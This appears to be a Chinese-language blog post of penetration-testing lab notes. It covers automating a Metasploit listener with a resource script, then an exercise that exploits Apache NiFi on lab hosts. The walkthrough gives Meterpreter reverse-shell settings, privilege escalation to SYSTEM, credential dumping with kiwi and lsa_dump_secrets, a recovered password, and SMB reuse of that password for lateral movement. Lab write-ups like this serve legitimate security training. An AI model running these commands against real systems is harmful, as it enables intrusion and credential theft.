自動化 Metasploit

 自動化 Metasploit

先執行 Metasploit

然後啟動多/處理程序模組

use exploit/multi/handler

set PAYLOAD windows/meterpreter_reverse_https

set LHOST 192.168.45.208

set LPORT 443




接著配置 AutoRunScript 選項,以便在建立會話後自動執行模組

此範例,我們使用 post/windows/manage/migrate 模組。

這將導致產生的 Meterpreter 自動啟動後台 notepad.exe 進程並遷移到它

接著將 ExitOnSession 設為 false,以確保偵聽器在建立工作階段後繼續接受新連線

最後添加帶有參數 -z 和 -j 的 run,以將其作為後台作業運行,並阻止我們自動與會話互動

set AutoRunScript post/windows/manage/migrate 
set ExitOnSession false
run -z -j




現在,讓我們儲存腳本,建立一個 listener.rc 將上述指令通通包進去




輸入 msfconsole 並將資源腳本作為 -r 的參數來啟動 Metasploit

指令 sudo msfconsole -r listener.rc

跟上述手動執行結果一樣,啟動後直接 listen 443




一樣透過 met.exe 看到自動連到 443,然後腳本自動執行 migrate 到記事本了





上述是我們自己建立的一個腳本,事實上在 Metasploit 中有許多自動化的腳本位於

Metasploit 目錄的 script/resource/ 目錄中可供直接使用

└─$ ls -l /usr/share/metasploit-framework/scripts/resource





設定 RHOST 時使用 set RHOST

但若要設定全域設定可以用 setg RHOST,取消是 unsetg RHOST

portscan.rc 掃描的第一個 Port 是 7

└─$ cat /usr/share/metasploit-framework/scripts/resource/portscan.rc








練習 3

靶機 192.168.186.225/226

有一台看到有開 8080 Port 進入逛一下發現是 Apache NiFi




那就 Metasploit 開啟直接 search NiFi,看來就是 Use 2 了




show options 後將改給的值與相關的值修正




set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp

show options 發現 target 是 unix,那就 set target 1 改成 windows




run 之後 225 那一台 reverse shell 拿到了,getsystem 後提權成功拿到 NT AUTHORITY\SYSTEM




load kiwi 再 creds_msv 將 NALM HASH 拿到




沒有,改想法改使用 lsa_dump_secrets,下面就有密碼了





設定相關參數

set SMBUser itwk04admin


set SMBPass "AbductFoetidSpend1121_-" 


set RHOSTS 192.168.186.226


set payload windows/x64/meterpreter/bind_tcp


set LHOST 192.168.45.208


set LPORT 8000

run

拿到 226 shell 了






拿到答案了





留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

濫用 Windows 庫文件(Library File)

Challenge 0 - Secura(1)